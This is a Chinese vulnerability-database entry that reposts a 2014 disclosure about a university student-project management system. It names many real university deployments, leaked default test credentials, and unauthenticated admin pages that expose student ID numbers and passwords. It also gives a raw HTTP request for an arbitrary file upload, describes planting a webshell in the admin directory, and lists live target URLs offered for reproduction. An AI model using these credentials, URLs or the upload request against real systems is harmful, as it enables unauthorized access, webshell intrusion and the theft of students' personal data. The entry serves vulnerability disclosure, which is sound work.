某通用型大学生管理系统非授权访问

基本字段

漏洞编号：: SSV-95791

披露/发现时间：: 2014-12-30

提交时间：: 2014-12-30

漏洞等级：

漏洞类别：: 其他类型

影响组件：: 南京先极科技有限公司

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-088903

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： 1#操作手册泄漏测试用户及密码 2#非授权访问，可直接获取系统内所有用户关键信息 3#一枚任意文件上传漏洞 ### 详细说明：注意与其不同 [WooYun: 某通用型创新管理系统普通帐号可越权查看及修改任意用户（影响多所高等院校）](http://www.wooyun.org/bugs/wooyun-2014-064701) 官网：http://www.changedu.com/ 由南京先极科技有限公司开发的大学生创新创业训练项目智能管理系统关键字：大学生创新创业项目智能管理系统影响案例： http://desktop.nju.edu.cn/cx/ 南京大学大学生创新创业训练智能管理系统 http://dxscx.forestpolice.net/ 南京森林警察学院大学生创新创业训练智能管理系统 http://180.209.64.18/cxcy/Index.aspx 南京邮电大学大学生创新创业训练智能管理系统 http://210.26.14.200/ 西北民族大学大学生创新创业训练项目智能管理系统 http://sjjx.njit.edu.cn/cx/ 南京工程学院大学生创新训练智能管理系统 http://nausrt.njau.edu.cn/ 南京农业大学大学生创新训练智能管理系统 http://202.195.237.148/dcxm/Index.aspx 南京信息工程大学生创新训练智能管理系统 http://sy.cxxy.seu.edu.cn/cx/ 东南大学成贤学院大学生创新训练智能管理系统 http://cx.njxzc.edu.cn/ 南京晓庄大学生创新训练智能管理系统 http://210.38.64.108/cx/ 广东第二师范学院大学生创新训练智能管理系统 http://cx.yctc.edu.cn/ 盐城师范学院大学生创新训练智能管理系统 http://cxsb.yzu.edu.cn/ 扬州大学大学生创新训练智能管理系统 http://cxcy.shisu.edu.cn/ 上海外国语大学大学生创新创业项目智能管理系统 http://cxcy.lzu.edu.cn/Index.aspx 兰州大学大学生创新创业项目智能管理系统 http://210.46.116.20/ 哈尔滨商业大学大学生创新创业项目智能管理系统 http://jw1.jiangnan.edu.cn/dxscx/ 江南大学大学生创新创业项目智能管理系统 http://202.119.81.120/ 南京理工大学大学生创新创业项目智能管理系统 http://bylw.pk.njau.edu.cn/gxycx/ 南京农业大学大学生创新训练智能系统等等不一一列举 ### 漏洞证明：以西北民族大学大学生创新创业训练项目智能管理系统为例 ``` http://210.26.14.200 ``` 入侵思路：试探admin弱口令，及登录注入，无突破，想到大部分校园系统学号即密码，又懒得去找，最后发现系统有个操作手册，下载之，发现了测试帐号 1#操作手册泄漏测试用户及密码 ``` http://210.26.14.200/UpLoadFile/690476.doc ``` [<img src="https://images.seebug.org/upload/201412/271108594f61a5d65aef61b4bc6996d701b3a97a.jpg" alt="QQ截图20141227110842.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271108594f61a5d65aef61b4bc6996d701b3a97a.jpg) [<img src="https://images.seebug.org/upload/201412/271108173999addd8008abdf912aafc434ff2926.jpg" alt="QQ截图20141227110554.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271108173999addd8008abdf912aafc434ff2926.jpg) [<img src="https://images.seebug.org/upload/201412/2711101499330e9f3f76c4452a87b12299b52bfc.jpg" alt="QQ截图20141227110614.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2711101499330e9f3f76c4452a87b12299b52bfc.jpg) [<img src="https://images.seebug.org/upload/201412/27111033f096b685ba5b4070a0fa0e273e679bd0.jpg" alt="QQ截图20141227110722.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27111033f096b685ba5b4070a0fa0e273e679bd0.jpg) 测试帐号，可通用于大部分系统 s1/1 s2/1 s1/s1 s2/s2 st1/1 等等 2#未授权访问地址（有多处，无需登陆，以下仅举关键2处）： 2.1# ``` http://210.26.14.200/Admin/SelStudent.aspx ``` [<img src="https://images.seebug.org/upload/201412/271056144c65f3bb3ca588074a012830f51ccf8e.jpg" alt="QQ截图20141227105038.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271056144c65f3bb3ca588074a012830f51ccf8e.jpg) [<img src="https://images.seebug.org/upload/201412/27105628b764af4b875d01d01c7d0885340f8104.jpg" alt="QQ截图20141227105313.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27105628b764af4b875d01d01c7d0885340f8104.jpg) [<img src="https://images.seebug.org/upload/201412/2710554832764098248294510cd7b55f3e4b1e0e.jpg" alt="QQ截图20141227105457.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2710554832764098248294510cd7b55f3e4b1e0e.jpg) 2.2# ``` http://210.26.14.200/Admin/SelTutor.aspx ``` [<img src="https://images.seebug.org/upload/201412/271059082fdb0d41ac831d737e15fc2edfcf6c01.jpg" alt="QQ截图20141227105746.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271059082fdb0d41ac831d737e15fc2edfcf6c01.jpg) 可导出！部分版本显示字段可能不同，但一个系统里关键的用户数据能泄漏的都泄漏了，右键查看源代码，可获得身份证完整字段，密码即学号或教工号（部分版本密码未加密，明文存放） 3#一枚明显的任意文件上传漏洞（以s1/1登录系统） ``` http://210.26.14.200/HelperScripts//ftb.imagegallery.aspx?rif=image&cif=image ``` 上传抓包改包（上传路径可改，cookie注意替换） ``` POST http://210.26.14.200/images/Upload.axd?frame=1&rif=image&cif=image&File=ImagesData/s11542/9803 HTTP/1.1 Accept: text/* Content-Type: multipart/form-data; boundary=----------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 User-Agent: Shockwave Flash Host: 210.26.14.200 Content-Length: 431 Connection: Keep-Alive Pragma: no-cache Cookie: ASP.NET_SessionId=zowfhv4500ivgn45oqergc45; .loginAuth=1395AFF5A2701FEDFC6445C9D1BF33DE9C5306EB31C9F0DE0BFF002A94D133A5A2C02DA9AD2265D512F6E0EF7F2CF634DF41749B59E7270117ECF9BBF828A4012BC93DF101C34393501B0550E6505454 ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 Content-Disposition: form-data; name="Filename" wooyun.aspx ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 Content-Disposition: form-data; name="Filedata"; filename="wooyun.aspx" Content-Type: application/octet-stream wooyun test ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5-- ``` 上传路径http://210.26.14.200/ImagesData/s11542/9803/wooyun.aspx [<img src="https://images.seebug.org/upload/201412/27120231e272610b32b4d3fe572cda8b9e2a047a.jpg" alt="QQ截图20141227120207.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27120231e272610b32b4d3fe572cda8b9e2a047a.jpg) 当然程序本身有做一些处理，无法直连上传后的一句话木马，大马上传的话，几个操作后就会timeout;经过测试发现，将一句话上传到admin目录后，可以直连，并无异常情况发生，剩下的无需多言。上刀： [<img src="https://images.seebug.org/upload/201412/2712254966793707e7a1db34078e4662f47a47d3.jpg" alt="QQ截图20141227122209.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2712254966793707e7a1db34078e4662f47a47d3.jpg) [<img src="https://images.seebug.org/upload/201412/2712255827a8a2847de20dc8de931c227726361b.jpg" alt="QQ截图20141227122537.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2712255827a8a2847de20dc8de931c227726361b.jpg) 以下案例供复现： http://desktop.nju.edu.cn/cx/Admin/SelStudent.aspx [<img src="https://images.seebug.org/upload/201412/27122952dd61bbee270a4ee50d04b9cabe44cd0b.jpg" alt="QQ截图20141227122735.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27122952dd61bbee270a4ee50d04b9cabe44cd0b.jpg) http://desktop.nju.edu.cn/cx/HelperScripts//ftb.imagegallery.aspx?rif=image&cif=image http://dxscx.forestpolice.net/Admin/SelStudent.aspx http://180.209.64.18/cxcy/Admin/SelStudent.aspx http://sjjx.njit.edu.cn/cx/Admin/SelStudent.aspx http://nausrt.njau.edu.cn/Admin/SelStudent.aspx http://202.195.237.148/dcxm/Admin/SelStudent.aspx http://sy.cxxy.seu.edu.cn/cx/Admin/SelStudent.aspx http://cx.njxzc.edu.cn/Admin/SelStudent.aspx http://210.38.64.108/cx/Admin/SelStudent.aspx 复制好累，案例很多，大部分系统学号即密码

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-088903

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某通用型大学生管理系统非授权访问

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定